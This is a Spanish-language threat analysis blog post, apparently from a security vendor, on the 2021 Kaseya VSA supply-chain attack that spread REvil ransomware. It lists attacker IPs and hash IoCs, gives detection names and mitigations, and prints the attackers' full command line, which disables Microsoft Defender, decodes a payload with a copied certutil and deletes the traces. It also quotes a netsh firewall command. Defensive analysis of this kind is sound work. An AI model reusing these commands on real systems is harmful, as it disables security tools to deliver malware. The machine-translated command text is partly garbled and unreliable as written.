En un evento reciente, Kaseya, proveedor estadounidense de software para MSP y equipos de TI, reportó un ataque global a la cadena de suministro el 2 de julio de 2021, aprovechando el Día de la Independencia de Estados Unidos, ya que el personal para monitorear el ataque sería menor. El grupo de hackers aprovechó la vulnerabilidad de día cero en el software Kaseya VSA para implementar el ransomware REvil entre sus clientes. El ataque, aprovechado por REvil, podría haber afectado a unos 60 MSP y sus clientes comerciales que utilizan la técnica de la cadena de suministro. Los atacantes exigieron un alto rescate por el proceso de descifrado o amenazaron con filtrar la información si no pagaban el rescate.
¿Qué es REvil/Sodinokibi?
REvil/Sodinokibi/Sodin es una nueva marca del ransomware GrandCrab, vinculada al grupo GOLD SOUTHFIELD, con motivaciones económicas. Este grupo es conocido por robar los datos de las víctimas antes de cifrarlos y amenaza con liberarlos si no se paga el rescate.
Han estado activos desde abril de 2019 y han causado cerca del 40% del total de infecciones de ransomware a nivel mundial. Inicialmente, el grupo atacaba Asia y Europa, pero ahora se ha expandido por todo el mundo.
Cuando el ransomware surgió por primera vez, explotaba vulnerabilidades en servidores y otros activos críticos de pymes e instaladores de software para explotar kits. Pero ahora, han comenzado su tendencia hacia ataques a la cadena de suministro. Ya hemos publicado... blog Respecto a GrandCrab, que se parece mucho al REvil ataque de ransomware.
¿Cómo entraron los atacantes?
Los piratas informáticos lanzaron un ataque contra los proveedores de MSP y explotaron la vulnerabilidad de día cero [CVE-2021-30116] en servidores VSA locales. Al infiltrarse en el servidor VSA, cualquier cliente conectado realizará cualquier tarea que el servidor VSA solicite sin cuestionarla. Los atacantes deshabilitan el acceso administrativo a VSA una vez que acceden a la red de la víctima.
Se descubrió que los atacantes utilizaron las siguientes direcciones IP para iniciar el ataque mientras usaban el usuario “agent curl/7.69.1”.
- 18[.]223.199.234
- 161[.]35.239.148
- 35[.]226.94.113
- 162[.]253.124.162
A diferencia del ataque a la cadena de suministro de SolarWinds, los servidores de Kaseya no presentan indicios de vulnerabilidad. Muchos de los clientes de Kaseya son proveedores de servicios gestionados (MSP). Los hackers explotaron la versión local del software y pudieron transmitir fácilmente el ataque de ransomware.
La cantidad exigida por el grupo oscila entre 50,000 y 5 millones de dólares, dependiendo de si el sistema está conectado a un dominio. Además, han exigido 70 millones de dólares por el descifrador universal, publicado en su sitio web oscuro.
Los detalles técnicos del ataque de día cero de Kaseya VSA
- La etapa inicial comienza cuando el proceso malicioso de los proveedores de servicios administrados (MSP) llega a los usuarios.
- El proceso VSA implementó el cifrado denominado “Kaseya VSA Agent Hotfix”, que se ejecuta en el sistema con acceso de administrador para eludir las medidas de seguridad para procesar la actualización.
- A continuación se muestra el script ejecutado, que deshabilita el servicio Microsoft Defender, DisableRealtimeMonitoring, DisableIntrusionPreventionSystem, DisableIOAVProtectio y DisableScriptScanning.
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Deshabilitado -EnableNetworkProtection AuditMode -Force -MAPSReporting Deshabilitado -SubmitSamplesConsent NeverSend & copy /YC:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /fc:\kworking\agent.crt C:\Windows\cert.exe y c:\kworking\agent.exe - Cuando se procesa esta actualización, entrega la carga útil REvil con el cargador ejecutable malicioso “agent.exe”.
- El Agent.exe tiene una firma digital válida firmada por “PE03 TRANSPORT LTD” y fue firmado un día antes del ataque.

Llamada del archivo Mpsvc.dll cargado lateralmente mediante MsMpEng.exe - Al utilizar “MsMpEng.exe”, se carga lateralmente el “Mpscv.dll” para ejecutar el ransomware.
- La cadena de proceso general se describe a continuación.

Proceso general
Sobre la ejecución del ransomware REvil.
- Inicia el proceso descifrándose en la memoria y extrayendo el archivo de configuración almacenado en formato JSON con los parámetros de configuración como se muestra. aquí.
- A diferencia de otras versiones, esta no elimina las instantáneas de Windows, como suele ocurrir con la mayoría del ransomware. Activarla podría detener el proceso, ya que la mayoría de las empresas de antivirus la utilizan como mecanismo de detección de ransomware.
- El cifrado AES se utiliza para cifrar las claves privadas del par de claves privada-pública, que se genera localmente en la máquina del usuario.
- Salsa20, por otro lado, se utiliza para encriptar archivos de usuario.

Guarda la configuración en el Registro - También crea la clave de registro "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter", donde se almacenan las claves generadas. Esta clave contiene una clave privada cifrada por la clave pública en la configuración. Las claves pública y privada se cifran en el binario. La cadena cifrada con la información se envía a los servidores C2, donde se añade una extensión de archivo aleatoria a los archivos cifrados.
- Al usar el comando que se indica a continuación, se agregan configuraciones de firewall de Windows para permitir que otras computadoras detecten el sistema local en la red local.
| netsh advfirewall firewall establecer grupo de reglas=”Descubrimiento de red” nueva habilitación=Sí |
- El cifrado comienza con múltiples subprocesos y cifra los archivos proporcionados en las extensiones, incluidas las unidades de red.
- REvil utiliza el algoritmo de generación e intercambio de claves "Diffie-Hellman de curva elíptica" para generar un par de claves pública-privada. Se desarrolla una clave secreta compartida para usarla como clave en los algoritmos de cifrado simétrico AES y Salsa20.
- Una vez hecho esto, se coloca un archivo de nota de rescate en cada carpeta con procedimientos sobre cómo recuperar los archivos.

Nota de rescate - El descifrado sólo se puede realizar tras el pago del importe del rescate, ya que la herramienta de descifrado universal aún no está disponible.

Página de descifrado en la dark web
Conclusión
Kaseya lanzó el parche el 11 de julio y también restableció la infraestructura SaaS de VSA. El parche se puede descargar desde aquíTambién han lanzado una herramienta para escanear y detectar posibles riesgos de explotación en el servidor VSA y para escanear endpoints. Descargar Aquí está. El ransomware es el problema más grave que interrumpe las operaciones. La motivación principal son los beneficios económicos que obtienen los atacantes. No podemos detener los ataques dirigidos, pero sí podemos prevenirlos.
Seqrite Aconseja a las organizaciones que estén alerta ante el creciente riesgo de ataques de ransomware y que se preparen con planes de respuesta ante incidentes y un equipo que pueda escalar los problemas.
Las formas proactivas de prevenir/limitar este tipo de ataques son:
- Incluya la cadena de suministro en su plan de respuesta y remediación.
- Mapear el panorama de amenazas.
- Asegúrese de que los proveedores de su cadena de suministro tengan políticas y procedimientos de seguridad estructurados, validados y certificados.
- Mantenga copias de seguridad actualizadas de datos valiosos para mitigar el daño causado.
Cómo Seqrite ¿Protege a sus usuarios?
Quick Heal proporciona herramientas proactivas para bloquear la carga útil del ransomware en esta ola de ataques. Quick Heal detecta las muestras con los siguientes nombres de detección:
- Trojanransom.Gen
- Trojanransom.Sodin
- Rescate.Mal
- Codificador de rescate de Trojan
- Trojan.Agent
Indicadores de compromiso (IoC)
Cargador
- 0299e3c2536543885860c7b61e1efc3f
- 5a97a50e45e64db41049fd88a75f2dd2
- be6c46239e9c753de227bf1f3428e271
- 835f242dde220cc76ee5544119562268
- 18786bfac1be0ddf23ff94c029ca4d63
- 8535397007ecb56d666b666c3592c26d
- 561cffbaba71a6e8cc1cdceda990ead4
DLL
- 78066A1C4E075941272A86D4A8E49471
- 040818b1b3c9b1bf8245f5bcb4eebbbc
- 849fb558745e4089a8232312594b21d2
- 4a91cb0705539e1d09108c60f991ffcf
- 7d1807850275485397ce2bb218eff159
- a560890b8af60b9824c73be74ef24a46
- a47cf00aedf769d60d58bfe00c0b5421
Archivo de configuración de REvil
Referencias
Aviso sobre el ataque de ransomware a la cadena de suministro de Kaseya VSA



